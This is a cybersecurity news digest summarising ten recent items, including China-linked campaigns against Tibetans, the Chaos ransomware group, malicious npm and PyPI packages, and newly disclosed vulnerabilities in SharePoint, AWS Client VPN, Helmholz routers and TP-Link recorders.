As the Dalai Lama’s 90th birthday approaches—a milestone worth candles and cake—threat actors are marking the occasion in darker ways, with China-nexus APTs launching GhostChat and PhantomPrayers campaigns targeting Tibetans. Meanwhile, a new RaaS group dubbed Chaos is wreaking havoc through big-game hunting and double extortion attacks, leveraging spam floods, social engineering, and RMM tools. Adding to the cyber mayhem, researchers discovered four malicious open-source packages packed with spyware and downloaded over 56,000 times, capable of keylogging, screen capture, webcam snooping, and more. Continue reading for more cybersecurity news from the last 24 hours.
01
China-nexus APT launched GhostChat and PhantomPrayers campaigns targeting Tibetans via compromised sites to deploy Ghost RAT and PhantomNet ahead of the Dalai Lama’s 90th birthday.
02
A new RaaS group, Chaos, is conducting big-game hunting and double extortion attacks using spam flooding, social engineering, and RMM tools for persistent access and data exfiltration.
03
A phishing campaign is exploiting Zoom-themed connection issues, using fear-driven emails and deceptive redirects to lure users to a fake Zoom login page for credential theft.
04
The Soco404 cryptomining campaign has been exploiting cloud vulnerabilities to deploy platform-specific malware, using process masquerading and persistent techniques like cron jobs and shell init files.
05
A malware has been found in WordPress’s "mu-plugins" folder that uses ROT13 and base64 for stealth and persistence, with IOCs including hidden admin users, malicious files, and modified database options.
06
Four malicious packages (three on npm, one on PyPI) have been discovered with over 56,000 downloads, containing surveillance malware capable of keylogging, screen capture, webcam access, fingerprinting, and credential theft.
07
Storm-2603, a suspected China-based threat actor, is exploiting unpatched SharePoint systems using CVE-2025-49706 and CVE-2025-49704 to deploy Warlock ransomware via web shell payloads.
08
AWS disclosed a critical security vulnerability (CVE-2025-8069) in its Client VPN software for Windows, which could allow attackers to gain administrator-level access.
09
Eight vulnerabilities, including critical flaws enabling full device takeover, were patched in Helmholz REX 100 routers, exposing risks like OS command execution, SQL injection, XSS, and DoS attacks.
10
TP-Link disclosed critical vulnerabilities in its VIGI Network Video Recorder models identified as CVE-2025-7723 and CVE-2025-7724 that allow unauthorized access, device manipulation, and lateral network movement.
